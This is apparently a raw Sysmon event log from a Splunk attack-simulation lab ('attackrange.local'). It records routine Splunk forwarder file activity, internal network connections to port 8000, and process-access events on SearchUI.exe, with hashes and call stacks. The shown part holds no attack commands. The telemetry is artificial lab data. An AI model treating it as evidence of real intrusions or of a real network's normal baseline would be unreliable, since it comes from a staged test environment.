Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.054{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2101DD81E1BA3F8EEA65A00E808BDBD6,SHA256=BC3E0B97296ABB76BC6A97F68B69DD3058C2E9F6C827852E5AA18CA164EA1763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:29.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3257B0C8EC4B802996D6865A1EF5C696,SHA256=6E37405EB6AC416B4EB61B87CAD5153F6DAD23EB1B485D71689035C2BCD11461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:29.146{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0006989076ABB6EAFAC80A652637D158,SHA256=1A028775B99463D1E2392D074ADC4C57CBBADCD9102D617ABDC73C34A07F8157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:29.366{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBD2B3EB4DE8C3D614FF9577A73E6F87,SHA256=7921693501B58877B124DEAA2B417031B0EA10150D67A9C3168AED29E4DC370A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C7E210E675AD42BC9974A93D573F4B6,SHA256=BC6A573E8AC32CC6BFC559B633705DFECA52C2D1DD845B7C47B839BFDD0844BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:30.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6A9C2DB2B544FF2F831F9503D216AD,SHA256=A749423480393EC1913BB90B3111BC716614869DE5C735B109931A5B7DB05AB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.194{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=4F8959D7E80A5FD9BCB59E4FA3B4E239,SHA256=62EBE1BFC1D93C89A2A1B37E8B189C9E4207AA16BBD69C1F8FFB3525619D4CDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61936-false10.0.1.12-8000- 354300x8000000000000000810010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:30.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57434-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:31.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2817DCAA8105152BD65FB4667960882E,SHA256=13E9FD1F000D7E6E23ED7433EDC28BD1A3A21238013225671AE41912A62269A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:31.177{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D53D9A0E7D056A535DD24179CEEDC7,SHA256=317398A21F3B30A6501732AD7887C3111D6E56362AD432D133F9C03EAEBBAF65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:32.804{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDFC836181801BE110B448D539A7345,SHA256=6513D9D7E3FEFABFE23BA904AE4A99679AF4DA602B2380279916E406DD35D155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:32.177{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A7DB717FD0C37EFCBA2F3E8AA4D57AB,SHA256=F619E04DBF728ED2B7992DE8DC372780032056CB2D18780145DA6551615F5DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:33.835{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377A5F15B7F37B559D0DAED8773A6689,SHA256=11728B074C1314978048235EFBC5EC6A7F81B013E564EB38F201EDACD0CED915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:33.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4F8740311904D5C238E2AAA05F1C21,SHA256=D12E80C7EDED1530FF911E686A97FBE8936D3C8B08522753E72B5900C0432751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:34.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E722DA5AE12D00946866480FAC0145D,SHA256=7206364766CEA4CB3DAF5C05708416CB4868F00BAE4109C472EBCDDE431C1292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.644{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83DF2F69B85B650EF0BA9CACD099D681,SHA256=67D8EB4C792390DE525EE5A6EBF0CB03726EC2217F33CEA95172F55B6D00B2F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.591{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.575{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.560{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.560{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.560{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.544{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.544{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 